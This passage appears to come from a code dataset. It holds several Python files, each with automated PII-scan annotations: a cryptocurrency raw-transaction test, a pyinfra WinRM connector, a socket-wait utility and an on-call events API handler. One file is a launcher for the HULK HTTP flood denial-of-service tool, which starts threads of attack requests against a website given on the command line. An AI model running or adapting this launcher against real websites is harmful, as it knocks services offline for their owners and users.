decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction
# non-witness transaction
encrawtx = ""PI:KEY""
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
# known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)
encrawtx = ""PI:KEY""
decrawtx = self.nodes[0].decoderawtransaction(encrawtx)
decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction
assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen
assert_equal(decrawtx['vin'][0]['coinbase'], ""PI:KEY"")
# Basic signrawtransaction test
addr = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr, 10)
self.nodes[0].generate(1)
self.sync_all()
vout = find_vout_for_address(self.nodes[1], txid, addr)
rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999})
rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)
txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex'])
self.nodes[0].generate(1)
self.sync_all()
# getrawtransaction tests
# 1. valid parameters - only supply txid
assert_equal(self.nodes[0].getrawtransaction(txId), rawTxSigned['hex'])
# 2. valid parameters - supply txid and 0 for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, 0), rawTxSigned['hex'])
# 3. valid parameters - supply txid and False for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, False), rawTxSigned['hex'])
# 4. valid parameters - supply txid and 1 for verbose.
# We only check the ""hex"" field of the output so we don't need to update this test every time the output format changes.
assert_equal(self.nodes[0].getrawtransaction(txId, 1)[""hex""], rawTxSigned['hex'])
# 5. valid parameters - supply txid and True for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, True)[""hex""], rawTxSigned['hex'])
# 6. invalid parameters - supply txid and string ""Flase""
assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, ""Flase"")
# 7. invalid parameters - supply txid and empty array
assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, [])
# 8. invalid parameters - supply txid and empty dict
assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, {})
inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 1000)
# 9. invalid parameters - sequence number out of range
inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : -1}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
# 10. invalid parameters - sequence number out of range
inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 4294967296}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 4294967294}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 4294967294)
####################################
# TRANSACTION VERSION NUMBER TESTS #
####################################
# Test the minimum transaction version number that fits in a signed 32-bit integer.
# As transaction version is unsigned, this should convert to its unsigned equivalent.
tx = CTransaction()
tx.nVersion = -0x80000000
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x80000000)
# Test the maximum transaction version number that fits in a signed 32-bit integer.
tx = CTransaction()
tx.nVersion = 0x7fffffff
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x7fffffff)
self.log.info('sendrawtransaction/testmempoolaccept with maxfeerate')
# Test a transaction with a small fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ ""txid"" : txId, ""vout"" : vout['n'] }]
# Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 SYS/sat)) = 0.9999
outputs = { self.nodes[0].getnewaddress() : Decimal(""0.99990000"") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000)
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'])
# Test a transaction with a large fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ ""txid"" : txId, ""vout"" : vout['n'] }]
# Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 SYS/sat)) = 0.98
outputs = { self.nodes[0].getnewaddress() : Decimal(""0.98000000"") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'])
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000')
if __name__ == '__main__':
RawTransactionsTest().main()
",28831,"[['MEDICAL_LICENSE', 'ZZ0000000'], ['MEDICAL_LICENSE', 'ZZ0000000'], ['DATE_TIME', '2014-2020'], ['NRP', 'OrderedDict'], ['PERSON', 'Constructed'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'json'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'address2'], ['PERSON', 'locktime'], ['PERSON', 'locktime'], ['PERSON', 'address2'], ['PERSON', 'address2'], ['PERSON', 'tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress'], ['PERSON', 'self.sync_all'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['PERSON', 'mSigObj = self.nodes[2].addmultisigaddress(2'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['LOCATION', 'addr.'], ['PERSON', 'addr3'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'addr3Obj'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['URL', 'https://github.com/bitcoin/bitcoin/issues/20579'], ['URL', 'framework.me'], ['URL', 'self.se'], ['URL', 'self.nu'], ['URL', 'self.su'], ['URL', 'self.sk'], ['URL', 'self.co'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.options.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no']]"
77,"from __future__ import print_function, unicode_literals
import base64
import ntpath
import click
from pyinfra import logger
from pyinfra.api import Config
from pyinfra.api.exceptions import ConnectError, PyinfraError
from pyinfra.api.util import get_file_io, memoize, sha1_hash
from .pyinfrawinrmsession import PyinfraWinrmSession
from .util import make_win_command
def _raise_connect_error(host, message, data):
message = '{0} ({1})'.format(message, data)
raise ConnectError(message)
@memoize
def show_warning():
logger.warning('The @winrm connector is alpha!')
def _make_winrm_kwargs(state, host):
kwargs = {
}
for key, value in (
('username', host.data.winrm_user),
('password', host.data.winrm_password),
('winrm_port', int(host.data.winrm_port or 0)),
('winrm_transport', host.data.winrm_transport or 'plaintext'),
('winrm_read_timeout_sec', host.data.winrm_read_timeout_sec or 30),
('winrm_operation_timeout_sec', host.data.winrm_operation_timeout_sec or 20),
):
if value:
kwargs[key] = value
# FUTURE: add more auth
# pywinrm supports: basic, certificate, ntlm, kerberos, plaintext, ssl, credssp
# see https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12
return kwargs
def make_names_data(hostname):
show_warning()
yield dummy@email.com(hostname), {'winrm_hostname': hostname}, []
def connect(state, host):
'''
Connect to a single host. Returns the winrm Session if successful.
'''
kwargs = _make_winrm_kwargs(state, host)
logger.debug('Connecting to: %s (%s)', host.name, kwargs)
# Hostname can be provided via winrm config (alias), data, or the hosts name
hostname = kwargs.pop(
'hostname',
host.data.winrm_hostname or host.name,
)
try:
# Create new session
host_and_port = '{}:{}'.format(hostname, host.data.winrm_port)
logger.debug('host_and_port: %s', host_and_port)
session = PyinfraWinrmSession(
host_and_port,
auth=(
kwargs['username'],
kwargs['password'],
),
transport=kwargs['winrm_transport'],
read_timeout_sec=kwargs['winrm_read_timeout_sec'],
operation_timeout_sec=kwargs['winrm_operation_timeout_sec'],
)
return session
# TODO: add exceptions here
except Exception as e:
auth_kwargs = {}
for key, value in kwargs.items():
if key in ('username', 'password'):
auth_kwargs[key] = value
auth_args = ', '.join(
'{0}={1}'.format(key, value)
for key, value in auth_kwargs.items()
)
logger.debug('%s', e)
_raise_connect_error(host, 'Authentication error', auth_args)
def run_shell_command(
state, host, command,
env=None,
success_exit_codes=None,
print_output=False,
print_input=False,
return_combined_output=False,
shell_executable=Config.SHELL,
**ignored_command_kwargs
):
'''
Execute a command on the specified host.
Args:
state (``pyinfra.api.State`` obj): state object for this command
hostname (string): hostname of the target
command (string): actual command to execute
success_exit_codes (list): all values in the list that will return success
print_output (boolean): print the output
print_intput (boolean): print the input
return_combined_output (boolean): combine the stdout and stderr lists
shell_executable (string): shell to use - 'cmd'=cmd, 'ps'=powershell(default)
env (dict): environment variables to set
Returns:
tuple: (exit_code, stdout, stderr)
stdout and stderr are both lists of strings from each buffer.
'''
command = make_win_command(command)
logger.debug('Running command on %s: %s', host.name, command)
if print_input:
click.echo('{0}>>> {1}'.format(host.print_prefix, command), err=True)
# get rid of leading/trailing quote
tmp_command = command.strip(""'"")
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, command),
err=True,
)
if not shell_executable:
shell_executable = 'ps'
logger.debug('shell_executable:%s', shell_executable)
# we use our own subclassed session that allows for env setting from open_shell.
if shell_executable in ['cmd']:
response = host.connection.run_cmd(tmp_command, env=env)
else:
response = host.connection.run_ps(tmp_command, env=env)
return_code = response.status_code
logger.debug('response:%s', response)
std_out_str = response.std_out.decode('utf-8')
std_err_str = response.std_err.decode('utf-8')
# split on '\r\n' (windows newlines)
std_out = std_out_str.split('\r\n')
std_err = std_err_str.split('\r\n')
logger.debug('std_out:%s', std_out)
logger.debug('std_err:%s', std_err)
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, '\n'.join(std_out)),
err=True,
)
if success_exit_codes:
status = return_code in success_exit_codes
else:
status = return_code == 0
logger.debug('Command exit status: %s', status)
if return_combined_output:
std_out = [('stdout', line) for line in std_out]
std_err = [('stderr', line) for line in std_err]
return status, std_out + std_err
return status, std_out, std_err
def get_file(
state, host, remote_filename, filename_or_io,
**command_kwargs
):
raise PyinfraError('Not implemented')
def _put_file(state, host, filename_or_io, remote_location, chunk_size=2048):
# this should work fine on smallish files, but there will be perf issues
# on larger files both due to the full read, the base64 encoding, and
# the latency when sending chunks
with get_file_io(filename_or_io) as file_io:
data = file_io.read()
for i in range(0, len(data), chunk_size):
chunk = data[i:i + chunk_size]
ps = (
'$data = [System.Convert]::FromBase64String(""{0}""); '
'{1} -Value $data -Encoding byte -Path ""{2}""'
).format(
base64.b64encode(chunk).decode('utf-8'),
'Set-Content' if i == 0 else 'Add-Content',
remote_location)
status, _stdout, stderr = run_shell_command(state, host, ps)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
return True
def put_file(
state, host, filename_or_io, remote_filename,
print_output=False, print_input=False,
**command_kwargs
):
'''
Upload file by chunking and sending base64 encoded via winrm
'''
# Always use temp file here in case of failure
temp_file = ntpath.join(
host.fact.windows_temp_dir(),
'pyinfra-{0}'.format(sha1_hash(remote_filename)),
)
if not _put_file(state, host, filename_or_io, temp_file):
return False
# Execute run_shell_command w/sudo and/or su_user
command = 'Move-Item -Path {0} -Destination {1} -Force'.format(temp_file, remote_filename)
status, _, stderr = run_shell_command(
state, host, command,
print_output=print_output,
print_input=print_input,
**command_kwargs
)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
if print_output:
click.echo(
'{0}file uploaded: {1}'.format(host.print_prefix, remote_filename),
err=True,
)
return True
EXECUTION_CONNECTOR = True
",7847,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'winrm_port'], ['PERSON', 'winrm_transport'], ['PERSON', 'host.data.winrm_transport'], ['PERSON', 'host.data.winrm_hostname'], ['PERSON', 'host_and_port'], ['PERSON', 'TODO'], ['PERSON', 'Args'], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['PERSON', 'tmp_command = command.strip'], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['LOCATION', 'chunk_size=2048'], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['URL', 'https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12'], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'logger.de'], ['URL', 'host.na'], ['URL', 'host.na'], ['URL', 'logger.de'], ['URL', 'kwargs.it'], ['URL', 'kwargs.it'], ['URL', 'logger.de'], ['URL', 'Config.SH'], ['URL', 'pyinfra.api.St'], ['URL', 'logger.de'], ['URL', 'host.na'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'command.st'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'logger.de'], ['URL', 'host.connection.ru'], ['URL', 'host.connection.ru'], ['URL', 'response.st'], ['URL', 'logger.de'], ['URL', 'response.st'], ['URL', 'out.de'], ['URL', 'response.st'], ['URL', 'err.de'], ['URL', 'logger.de'], ['URL', 'logger.de'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'logger.de'], ['URL', 'io.re'], ['URL', 'System.Co'], ['URL', 'logger.er'], ['URL', 'ntpath.jo'], ['URL', 'logger.er'], ['URL', 'click.ec'], ['URL', 'host.pr']]"
78,"#
# (C) Copyright 2011 Jacek Konieczny dummy@email.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# pylint: disable-msg=W0201
""""""Utility functions to wait until a socket (or object implementing .fileno()
in POSIX) is ready for input or output.""""""
from __future__ import absolute_import, division
__docformat__ = ""restructuredtext en""
import select
if hasattr(select, ""poll""):
def wait_for_read(socket, timeout = None):
""""""Wait up to `timeout` seconds until `socket` is ready for reading.
""""""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLIN)
events = poll.poll(timeout)
return bool(events)
def wait_for_write(socket, timeout = None):
""""""Wait up to `timeout` seconds until `socket` is ready for writing.
""""""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLOUT)
events = poll.poll(timeout)
return bool(events)
else:
def wait_for_read(socket, timeout = None):
""""""Wait up to `timeout` seconds until `socket` is ready for reading.
""""""
readable = select.select([socket], [], [], timeout)[0]
return bool(readable)
def wait_for_write(socket, timeout = None):
""""""Wait up to `timeout` seconds until `socket` is ready for writing.
""""""
writable = select.select([], [socket], [], timeout)[1]
return bool(writable)
",2121,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2011'], ['PERSON', 'Jacek Konieczny'], ['LOCATION', 'Mass Ave'], ['LOCATION', 'Cambridge'], ['LOCATION', 'MA 02139'], ['LOCATION', 'USA'], ['URL', 'email.com'], ['URL', 'poll.re'], ['URL', 'poll.re'], ['URL', 'select.se'], ['URL', 'select.se']]"
79,"""""""
HTTP UNBEARBALE LOAD QUEEN
A HULK EDIT BY @OBN0XIOUS
THE ORIGINAL MAKER OF HULK PLEASE GO BACK TO CODECADEMY
""""""
import sys
import argparse
import random
from threading import Thread
import hulqThreading
import hulqRequest
parser = argparse.ArgumentParser()
parser.add_argument('--threads', '-t', default=2, help='Choose how many threads.')
parser.add_argument('--website', '-w', help='Website you are attacking.')
systemArguments = parser.parse_args()
if not systemArguments.website:
sys.exit(""Provide -w or --website."")
userAgents = \
(
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:127.0.0.1 Gecko/20090913 Firefox/3.5.3', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:127.0.0.1 Gecko/20090718 Firefox/3.5.1', \
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US AppleWebKit/532.1 (KHTML, \ like Gecko Chrome/4.0.219.6 Safari/532.1', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2', \
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US', \
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP', \
'Opera/9.80 (Windows NT 5.2; U; ru Presto/2.5.22 Version/10.51'
)
referers = \
(
'http://www.google.com/?q=', \
'http://www.usatoday.com/search/results?q=', \
'http://engadget.search.aol.com/search?q='
)
for i in range(0, int(systemArguments.threads)):
referer = random.choice(referers)
userAgent = random.choice(userAgents)
t1 = Thread(target = hulqRequest.httpAttackRequest, args = (systemArguments.website, userAgent, referer))
t1.start()
",2175,"[['LOCATION', ""help='Choose""], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Firefox/3.5.3'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Firefox/3.5.3'], ['PERSON', 'Mozilla/5.0'], ['LOCATION', 'US'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/4.0'], ['URL', 't1.st'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '4.0.219.6'], ['DATE_TIME', '1.1.4322'], ['DATE_TIME', '2.5.22'], ['URL', ""http://www.google.com/?q=',""], ['URL', ""http://www.usatoday.com/search/results?q=',""], ['URL', ""http://engadget.search.aol.com/search?q='""], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'systemArguments.th'], ['URL', 'random.ch'], ['URL', 'random.ch'], ['URL', 'hulqRequest.ht']]"
80,"# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import json
import time
from .events import on_get as get_events
from collections import defaultdict
import requests
from ujson import dumps as json_dumps
from falcon import HTTPStatus, HTTP_200
class PaidEvents(object):
def __init__(self, config):
self.config = config
def on_get(self, req, resp):
""""""
Search for events. Allows filtering based on a number of parameters,
detailed below. Also returns only the users who are paid to be on call. Uses response from
oncall-bonus to identify paid status.
**Example request**:
.. sourcecode:: http
GET /api/v0/oncall_events?team=foo-sre&end__gt=1487466146&role=primary HTTP/1.1
Host: example.com
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
""ldap_user_id"":
[
{
""start"": 1488441600,
""end"": 1489132800,
""team"": ""foo-sre"",
""link_id"": null,
""schedule_id"": null,
""role"": ""primary"",
""user"": ""foo"",
""full_name"": ""Foo Icecream"",
""id"": 187795
},
{
""start"": 1488441600,
""end"": 1489132800,
""team"": ""foo-sre"",
""link_id"": ""PI:KEY"",
""schedule_id"": 123,
""role"": ""primary"",
""user"": ""bar"",
""full_name"": ""Bar Apple"",
""id"": 187795
}
]
]
:query team: team name
:query user: user name
:query role: role name
:query id: id of the event
:query start: start time (unix timestamp) of event
:query end: end time (unix timestamp) of event
:query start__gt: start time (unix timestamp) greater than
:query start__ge: start time (unix timestamp) greater than or equal
:query start__lt: start time (unix timestamp) less than
:query start__le: start time (unix timestamp) less than or equal
:query end__gt: end time (unix timestamp) greater than
:query end__ge: end time (unix timestamp) greater than or equal
:query end__lt: end time (unix timestamp) less than
:query end__le: end time (unix timestamp) less than or equal
:query role__eq: role name
:query role__contains: role name contains param
:query role__startswith: role name starts with param
:query role__endswith: role name ends with param
:query team__eq: team name
:query team__contains: team name contains param
:query team__startswith: team name starts with param
:query team__endswith: team name ends with param
:query team_id: team id
:query user__eq: user name
:query user__contains: user name contains param
:query user__startswith: user name starts with param
:query user__endswith: user name ends with param
:statuscode 200: no error
:statuscode 400: bad request
""""""
config = self.config
